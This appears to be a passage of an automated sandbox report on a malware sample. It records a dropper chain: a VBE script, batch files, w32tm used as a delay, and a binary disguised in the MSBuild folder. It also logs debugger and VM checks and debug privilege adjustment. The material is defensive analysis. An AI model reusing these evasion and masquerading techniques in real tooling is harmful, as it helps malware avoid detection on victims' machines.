                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 595844Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 595516Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 595016Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 594469Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 594016Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 593813Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 593610Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 300000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 593204Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 592829Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 592579Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 592239Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 591875Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 591484Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 591047Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 590913Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 590625Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 590313Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 589969Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 589729Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 589422Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 589047Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 588704Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 588438Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 588151Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 588016Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587895Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587781Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587665Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587563Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587438Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587313Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587200Jump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: CJF0Ri1HrG.exe, 00000000.00000002.1623066278.0000000002965000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\V
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2857122847.0000000000943000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
                          Source: w32tm.exe, 0000000C.00000002.1969770805.0000029742279000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                          Source: CJF0Ri1HrG.exe, 00000000.00000003.1620326689.0000000002960000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\@WV
                          Source: hyperbrokerhostNetsvc.exe, 00000005.00000000.1877081316.0000000000632000.00000002.00000001.01000000.0000000A.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe0.5.dr, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe.5.dr, TextInputHost.exe.5.dr, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe2.5.dr, hyperbrokerhostNetsvc.exe.0.dr, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe1.5.drBinary or memory string: MTFXU6PmHgFsVvykXgRk
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeAPI call chain: ExitProcess graph end nodegraph_0-23658
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0037F838
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_00387DEE mov eax, dword ptr fs:[00000030h]0_2_00387DEE
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0038C030 GetProcessHeap,0_2_0038C030
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0037F838
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037F9D5 SetUnhandledExceptionFilter,0_2_0037F9D5
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0037FBCA
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_00388EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00388EBD
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PortCommon\rjsrhuSUuh9cpi71VW4.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortCommon\nit1Mf9O4EmsELqVOc064rhxVFPSMSL237.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\PortCommon\hyperbrokerhostNetsvc.exe C:\PortCommon/hyperbrokerhostNetsvc.exeJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\P9ncPmw0Gs.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe "C:\Program Files (x86)\msbuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe" Jump to behavior
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2858831534.0000000002A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager Z
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037F654 cpuid 0_2_0037F654
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0037AF0F
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeQueries volume information: C:\PortCommon\hyperbrokerhostNetsvc.exe VolumeInformationJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
